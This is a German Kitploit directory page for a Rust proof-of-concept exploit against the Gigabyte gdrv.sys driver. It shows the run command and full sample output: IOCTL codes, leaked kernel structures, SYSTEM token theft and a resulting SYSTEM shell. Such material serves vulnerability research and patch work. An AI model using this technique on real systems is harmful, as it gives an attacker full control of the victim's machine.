Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-1932X — Rust-POC für Kernel-Treiber-Schwachstellen CVE-2018-1932X | Kitploit
Tools/GitHubGitHub/bkreisel/cve-2018-1932x
Privilege EscalationSchwachstellenanalyseExploitationPost-ExploitationPayload-EntwicklungBinary-Exploitation
GitHubbkreisel/cve-2018-1932x

CVE-2018-1932X

Rust-POC für Kernel-Treiber-Schwachstellen CVE-2018-1932X

Repository anzeigen
3vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-1932X ( Rust Exploit POC) für GIGABYTE APP Center v1.05.21 und früher

Nur weil Ihr Ziel speicherunsicher ist, heißt das nicht, dass Ihr Exploit das auch sein muss!

Verwendete Sicherheitslücken:

  • CVE-2018-19320 - ring0 memcpy-ähnliche Funktionalität
  • CVE-2018-19323 - Lesen und Schreiben von maschinenspezifischen Registern (MSRs).

Getestet auf:

  • 20H1: Windows 10 Kernel Version 19041 MP (1 procs) Free x64

Referenzen

  • Vergilius Project: Kernel-Strukturen
  • Gigabyte Patch-Ankündigung
  • _KPCR Einzelheiten

Voraussetzungen

  • nur x64
  • Getestete Builds siehe oben
  • Geladener GIGABYTE Treiber: gdrv.sys

Verwendung

.\CVE-2018-1932X.exe

Beispiel

root@kitploit:~
PS Z:\CVE-2018-1932X\target\debug> .\CVE-2018-1932X.exe
CVE-2019-1932X

Opening Handle to Kernel Driver: \\.\GIO
Acquired Handle: 0xa8
Sending IOCTL: 0xc3502580 with 0x10 bytes of data
  [+] Leaked   _KPCR: ffffe48159d88000
  [*] Address  _KPCRB: ffffe48159d88020
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KPRCB: ffffe48159d88180
  [*] Address  _KTHREAD: ffffe48159d88188
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KTHREAD: ffffb50b14d16080
  [*] Address  _KPROCESS: ffffb50b14d162a0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KPROCESS: ffffb50b1507f080
  [*] Address  PID: ffffb50b1507f4c0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   PID: 2092
  [+] Known    PID: 2092
Walking Active Process Links...
  [*] Address  ActiveProcessLinks.Flink: ffffb50b1507f4c8 (PID: 82c)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _EPROCESS: fffff8015561e060 (PID: 0)
  [*] Address  ActiveProcessLinks.Flink: fffff8015561e060 (PID: 0)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _EPROCESS: ffffb50b100624c8 (PID: 4)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Current Token: ffff9708cac8306e
  [+] System  Token: ffff9708c567b047
Borrowing SYSTEM Token...
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Current Token: ffff9708c567b047
Spawning Process...
  [+] Spawned SYSTEM Process
Closing Handle to Kernel Driver: \\.\GIO

Gestartete PowerShell:

root@kitploit:~
PS C:\> whoami
nt authority\system

Angreifbare Blöcke

Memcpy (IOCTL 0x0C3502808)

Memcpy Code Blocks

MSR-Manipulation (IOCTL 0x0C3502580)

MSR Code Blocks

Tool herunterladen